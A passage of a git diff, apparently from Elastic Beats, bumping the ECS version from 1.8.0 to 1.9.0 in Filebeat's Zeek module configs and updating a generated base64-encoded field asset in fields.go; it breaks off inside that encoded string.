b14165562ea..062eff8f09a 100644 --- a/x-pack/filebeat/module/zeek/dce_rpc/config/dce_rpc.yml +++ b/x-pack/filebeat/module/zeek/dce_rpc/config/dce_rpc.yml @@ -58,4 +58,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/dhcp/config/dhcp.yml b/x-pack/filebeat/module/zeek/dhcp/config/dhcp.yml index b59227d30df..01c30bd3ae9 100644 --- a/x-pack/filebeat/module/zeek/dhcp/config/dhcp.yml +++ b/x-pack/filebeat/module/zeek/dhcp/config/dhcp.yml @@ -120,4 +120,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/dnp3/config/dnp3.yml b/x-pack/filebeat/module/zeek/dnp3/config/dnp3.yml index 6cd83108b41..beb62e217c7 100644 --- a/x-pack/filebeat/module/zeek/dnp3/config/dnp3.yml +++ b/x-pack/filebeat/module/zeek/dnp3/config/dnp3.yml @@ -68,4 +68,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/dns/config/dns.yml b/x-pack/filebeat/module/zeek/dns/config/dns.yml index 73130461034..fbc26fe59a4 100644 --- a/x-pack/filebeat/module/zeek/dns/config/dns.yml +++ b/x-pack/filebeat/module/zeek/dns/config/dns.yml @@ -210,4 +210,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/dpd/config/dpd.yml b/x-pack/filebeat/module/zeek/dpd/config/dpd.yml index b7a9c30ec10..b65f5dd6441 100644 --- a/x-pack/filebeat/module/zeek/dpd/config/dpd.yml +++ b/x-pack/filebeat/module/zeek/dpd/config/dpd.yml @@ -57,4 +57,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/fields.go b/x-pack/filebeat/module/zeek/fields.go index d048c716bf6..a0740161b64 100644 --- a/x-pack/filebeat/module/zeek/fields.go +++ b/x-pack/filebeat/module/zeek/fields.go @@ -19,5 +19,5 @@ func init() { // AssetZeek returns asset data. // This is the base64 encoded gzipped contents of module/zeek. func AssetZeek() string { - return "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